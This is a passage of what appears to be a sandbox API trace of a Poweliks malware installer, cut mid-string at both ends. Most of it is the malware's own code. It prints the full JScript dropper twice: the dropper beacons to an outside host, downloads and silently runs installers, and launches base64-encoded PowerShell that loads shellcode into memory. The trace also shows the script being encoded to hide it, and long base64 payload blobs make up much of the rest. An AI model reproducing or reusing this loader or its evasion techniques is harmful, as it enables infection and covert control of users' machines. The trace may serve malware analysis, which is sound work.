FJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBU") returned 30609 [0035.947] CoCreateInstance (in: rclsid=0x404d2c*(Data1=0x32da2b15, Data2=0xcfed, Data3=0x11d1, Data4=([0]=0xb7, [1]=0x47, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xc2, [6]=0xb0, [7]=0x85)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x404d3c*(Data1=0xaadc65f6, Data2=0xcff1, Data3=0x11d1, Data4=([0]=0xb7, [1]=0x47, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xc2, [6]=0xb0, [7]=0x85)), ppv=0x18f010 | out: ppv=0x18f010*=0x74f640) returned 0x0 [0036.188] Encoder:IScriptEncoder:EncodeScriptFile (in: This=0x74f640, szExt="", bstrStreamIn="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%windir%\");p=w+\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%temp%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"\");}d(\"\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBU", cFlags=0, bstrDefaultLang="js", pbstrStreamOut=0x18f00c | out: pbstrStreamOut=0x18f00c*="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0036.224] GetVersion () returned 0x1db10106 [0036.224] __dllonexit () returned 0x74a97ecf [0036.224] __dllonexit () returned 0x74a97e9b [0036.224] __dllonexit () returned 0x74a97eb5 [0036.224] __dllonexit () returned 0x74a97f70 [0036.225] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76760000 [0036.225] GetProcAddress (hModule=0x76760000, lpProcName="RegisterTraceGuidsA") returned 0x775c848f [0036.225] EtwRegisterTraceGuidsA () returned 0x0 [0036.226] GetProcAddress (hModule=0x76760000, lpProcName="RegisterTraceGuidsA") returned 0x775c848f [0036.226] EtwRegisterTraceGuidsA () returned 0x0 [0036.226] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18c974, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\poweliks_installer.exe")) returned 0x3c [0036.227] GetProcAddress (hModule=0x76760000, lpProcName="RegOpenKeyExA") returned 0x76774907 [0036.227] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x18ca98 | out: phkResult=0x18ca98*=0x0) returned 0x2 [0036.230] GetVersion () returned 0x1db10106 [0036.230] DllGetClassObject (in: rclsid=0x4f3b2c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x755bee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18d284 | out: ppv=0x18d284*=0x74f670) returned 0x0 [0036.230] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x74f670, pUnkOuter=0x0, riid=0x18dc30*(Data1=0xbb1a2ae3, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18d270 | out: ppvObject=0x18d270*=0x74f6bc) returned 0x0 [0036.230] GetUserDefaultLCID () returned 0x409 [0036.230] GetACP () returned 0x4e4 [0036.231] IUnknown:Release (This=0x74f6bc) returned 0x1 [0036.231] JScriptEngine5:IUnknown:Release (This=0x74f670) returned 0x0 [0036.231] IUnknown:QueryInterface (in: This=0x74f6bc, riid=0x74c3c288*(Data1=0xbb1a2ae3, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18df64 | out: ppvObject=0x18df64*=0x74f6bc) returned 0x0 [0036.231] IUnknown:Release (This=0x74f6bc) returned 0x1 [0036.231] IActiveScriptEncode:EncodeSection (in: This=0x74f6bc, pchIn="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%windir%\");p=w+\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%temp%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"\");}d(\"\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcs